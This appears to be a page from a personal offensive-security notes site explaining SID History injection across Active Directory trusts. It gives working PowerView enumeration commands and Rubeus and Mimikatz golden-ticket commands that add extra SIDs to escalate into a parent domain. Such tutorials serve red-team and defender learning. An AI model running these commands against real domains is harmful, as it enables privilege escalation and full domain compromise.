🦦
Otter's Notes
  • Introduction
  • Articles
    • Dumping data from the Microsoft Recall folder
    • Gaining persistence on Windows with Time Providers
    • Reverse engineering LSASS to decrypt DPAPI keys
    • Intro to Hypervisor Implants
    • In-depth Windows Telemetry
  • Notes
    • Active Directory
      • Active Directory Structure
      • Active Directory Terminology
      • Active Directory Objects
      • Active Directory Groups
      • Active Directory Functionality
      • Active Directory Protocols
      • Active Directory Rights and Privileges
      • Security in Active Directory
      • Users and Machine Accounts
      • NTLM
      • LDAP
      • Making a Target User List
      • Enumerating & Retrieving Password Policies
      • Enumerating Security Controls
      • Examining Group Policy
      • GPOs
      • LAPS
      • LLMNR & NBT-NS Poisoning
      • LOLBIN Enumeration
    • AAD
      • Useful Links
      • Overview of Azure & M365
      • Enumerate Users and Domains
      • Post-exploitation Reconnaissance
      • OAuth 2.0 Abuse
      • Abusing Device Code Authentication
      • Abusing Cloud Administrator Role
      • Abusing User Administrator Role
      • AAD Federated Backdoor
      • Service Principal Abuse
      • Compromising Azure Blobs and Storage Accounts
      • Malicious Device Join
      • Disabling Auditing (Unified Audit Logs)
      • Spoofing Azure Sign-In Logs
      • Registering Fake Agents for Log Spoofing
      • Pass the PRT
      • Pass the Cookie
      • Abusing Managed Identities
      • Virtual Machine Abuse
      • Attacking Key Vaults
    • Forest Trust Abuse
      • Parent-Child Trust Abuse
      • One-Way Inbound Trust Abuse
      • Foreign Group Membership
      • Foreign ACL Principals
      • SID History
      • SID Filter Bypass
      • Intra-Forest Attacks
        • Configuration Naming Context Replication
        • ADCS NC Replication Attack
        • GPO On-Site Attack
        • GoldenGMSA Attack
        • DNS Trust Attack
      • Cross-Forest Attacks
        • Trust Account Attack
        • Abusing SQL Linked Servers
        • Abusing PAM Trusts
    • Kerberos
      • Overview of Kerberos Authentication
      • Silver Tickets
      • Golden Tickets
      • Diamond Tickets
      • Kerberoasting
      • AS-REPRoasting
      • Resource-Based Constrained Delegation
      • Constrained Delegation
      • Unconstrained Delegation
      • S4U2Self & S4U2Proxy
      • Golden Certificates
    • DACL Abuse
      • DACL Overview
      • DACLs Enumeration
      • AddMembers
      • GPO Attacks
      • Granting Rights and Ownership
      • Logon Scripts
      • NoPAC
      • Password Abuse
      • SPN Jacking
      • Shadow Credentials
      • Targeted Kerberoasting
    • ADCS
      • Introduction to ADCS
      • ESC1
      • ESC2
      • ESC3
      • ESC4
      • ESC5
      • ESC6
      • ESC7
      • ESC8
      • ESC9
      • ESC10
      • ESC11
      • Certificate Mapping
    • PowerShell
      • PowerShell Basics
      • PowerShell Remoting
      • Alternate PowerShell Hosts
      • PowerShell Pipeline Runners
      • PowerShell Code Signing
      • Scriptblock Logging
      • PowerShell CLM
      • AMSI
      • PowerShell Reflection
      • WMI - Windows Management Instrumentation
      • Interfacing with AD
      • PowerShell Snippets
        • Bypass application whitelisting and CLM with runscripthelper and WMI
        • Create fake PowerShell logs
        • Enumerate AD ACLs
        • Enumerate WMI events
        • Enumerate Domain Trusts
        • Enumerate change metadata
        • Enumerate non-signed service binaries
        • Enumerate with GPOs
        • Find signed alternate PowerShell hosts
        • Get AMSI module
        • Group processes by user with WMI
        • Hide processes from Get-Process
        • Malware re-purposing with PowerShell reflection
        • Monitor PowerShell hosts with WMI
        • PowerShell reflection offensive use-case
        • Query PowerShell alternative hosts with WMI
        • Retrieve file certificate
        • Search LDAP for misconfigurations
        • Sign custom code with PowerShell
        • WMI service creation
        • Weak folder permission enumeration
    • AWS
      • AWS Organizations
      • AWS Principals
    • Binary Exploitation
      • Environment setup for Browser Exploitation
      • Browser Overview and Components
    • Kernel Development
      • Windows
        • Configuring a VM for driver development
Powered by GitBook
On this page
  1. Notes
  2. Forest Trust Abuse

SID History

PreviousForeign ACL PrincipalsNextSID Filter Bypass

Last updated 11 months ago

Group 1Sid history is a technique used to escalate privileges in a parent-child trust configuration.

This attack abuses a TGT attribute called SID History which is a legitimate attribute that was designed to handle the transition of a user from a domain to another: to make sure the moved user maintained access to the previous domain even after being moved to the second one, the user's old SID would be added to the SID History attribute of their account. We can find more information on it and .

Manipulating the SID History attribute of a ticket allows users from the child domain to inherit permissions or group memberships from the parent domain; this is possible because is not enabled when dealing with domains from the same forest.

I've documented the different exploitation methods .

SID History Injection

SID History Injection (or SID Hijacking) refers an attack that consists in injecting the SID of a highly privileged group or user from the target domain into a low-privileged user account in the source domain.

If we're dealing with SID Hijacking in cross-forest configuration we have to be aware that will filter out all SIDs with a Relative Identifier (RID) of 1000. This security measure is usually circumvented by leveraging SIDs with identifiers equal to or higher than 1000 since they might still be associated with high-privilege users or groups.

To start off we can see whether SID History is enabled in the domain at all

Import-Module .\PowerView.ps1
Get-DomainTrust -domain otherdomain.com | Where-Object {$_.TargetName -eq "domain.com"} | Select TrustAttributes

If the output of this command includes the TREAT_AS_EXTERNAL attribute then SID History is enabled within the trust.

Now we can enumerate users with SID History enabled we can use the Get-ADUser cmdlet

Get-ADUser -Filter "SIDHistory -Like '*'" -Properties SIDHistory

If we find some interesting user we can reset their password and use a sacrificial PowerShell process to request a TGT for them.

Looking at the user's permissions, we can either decide to abuse existing permissions or execute an ExtraSIDs attack to request a ticket for the user with SID History enabled but with different (and possibly higher) privileges. In order to perform the attack we need:

  • The KRBTGT hash for the current domain

  • The SID for the current domain

  • The name of a target user in the current domain (Any domain user)

  • The FQDN of the current domain.

  • The SID of the high privileged group of the target domain

All these information can be retrieved with different methods: BloodHound, secretsdump, lookupsid, Mimikatz, ...

After we fetched all the data we need we can request a golden ticket with the extra SID

.\Rubeus.exe golden /rc4:<KRBTGT HASH> /domain:domain.com /sid:S-1-5-21-2432454459-173448545-3375717855 /sids:S-1-5-21-186204973-2882451676-2899969076-2602 /user:otter /ptt
mimikatz # kerberos::golden /user:otter /domain:domain.com  /sid:S-1-5-21-2432454459-173448545-3375717855 /sids:S-1-5-21-186204973-2882451676-2899969076-2602 /krbtgt:<KRBTGT HASH> /ptt
here
here
SID Filtering
here
SID Filtering